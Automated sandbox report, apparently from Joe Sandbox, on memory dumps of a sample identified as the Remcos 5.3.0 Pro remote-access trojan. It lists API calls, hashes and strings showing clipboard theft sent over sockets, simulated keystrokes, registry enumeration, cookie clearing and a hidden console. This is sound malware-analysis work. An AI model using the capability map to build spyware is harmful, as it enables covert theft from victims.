                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                                                                                                                                                              • String ID: T=G$X}$>G$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1596592924-1839278954
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 575e4c7363fd16fb853833927232439696c66fa3a59195aad406f6f506f91d39
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 575e4c7363fd16fb853833927232439696c66fa3a59195aad406f6f506f91d39
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                                                                                                                                              • String ID: TUF$TUFTUF$>G$DG$DG
                                                                                                                                                                                                                                                                                                                              • API String ID: 3114080316-72097156
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cf6b8ebac21d2dd4a0a00435169baf5ddcacbb67160d2a217508608402e6d0b8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf6b8ebac21d2dd4a0a00435169baf5ddcacbb67160d2a217508608402e6d0b8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                                                                                                                                                              • String ID: .part
                                                                                                                                                                                                                                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0041A906
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                                                                                                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                                                                                                                                                              • API String ID: 3286818993-703403762
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                                                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TUF
                                                                                                                                                                                                                                                                                                                              • API String ID: 1133728706-1738023494
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                                                                                                                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 0041BECF
                                                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                                                                                                                                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                                                                                                                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
• __alloca_probe_16.LIBCMT ref: 004499F2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
• __alloca_probe_16.LIBCMT ref: 00449AD7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
• __freea.LIBCMT ref: 00449B47
  • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
• __freea.LIBCMT ref: 00449B50
• __freea.LIBCMT ref: 00449B75
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
APIs
• SendInput.USER32 ref: 00418B18
• SendInput.USER32(00000001,?,0000001C), ref: 00418B40
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
• SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
  • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
• API ID: InputSend$Virtual
APIs
• OpenClipboard.USER32 ref: 00415A46
• EmptyClipboard.USER32 ref: 00415A54
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                                                              • String ID: a/p$am/pm$fD
                                                                                                                                                                                                                                                                                                                              • API String ID: 3509577899-1143445303
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00447ECC
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00447EF0
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448077
                                                                                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448243
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: dfec4532f193feed59ad12990e66811e171abe159fdac3e98e091326569521ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfec4532f193feed59ad12990e66811e171abe159fdac3e98e091326569521ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444096
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440AD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440CC
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440E7
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440FE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID: Z7D
                                                                                                                                                                                                                                                                                                                              • API String ID: 3033488037-2145146825
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A190
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02839C07,?,00000000,?,00000000,00000000), ref: 028394D4
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0283954F
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0283956A
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02839590
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,02839C07,00000000,?,?,?,?,?,?,?,?,?,02839C07,?), ref: 028395AF
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,02839C07,00000000,?,?,?,?,?,?,?,?,?,02839C07,?), ref: 028395E8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4b310fb67f00f20eb6abe2c00aab80f96580a2e65146c51cbc88c732e8d597fd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8d8766ad6066e8ae94f5492edd27eb0e34c3b0e45341ff96643ce1ca35e81397
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b310fb67f00f20eb6abe2c00aab80f96580a2e65146c51cbc88c732e8d597fd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3951F37DD00249AFDB11CFA8D895AEEBBF8EF08300F14455AE856E7291E7709951CFA0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,1001AE1B,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1001A6E8
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 1001A763
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 1001A77E
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1001A7A4
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7C3
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7FC
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                                                                                                              • Instruction ID: caa66828d063c4f57f6ca3a5c54d23115575f1b669959d2329a9049d7f1fcf44
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A5152719002499FDB10CFA4CC85BDEBBF5EF0A310F15416AE955EB291D730D992CBA1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B197: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1B7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
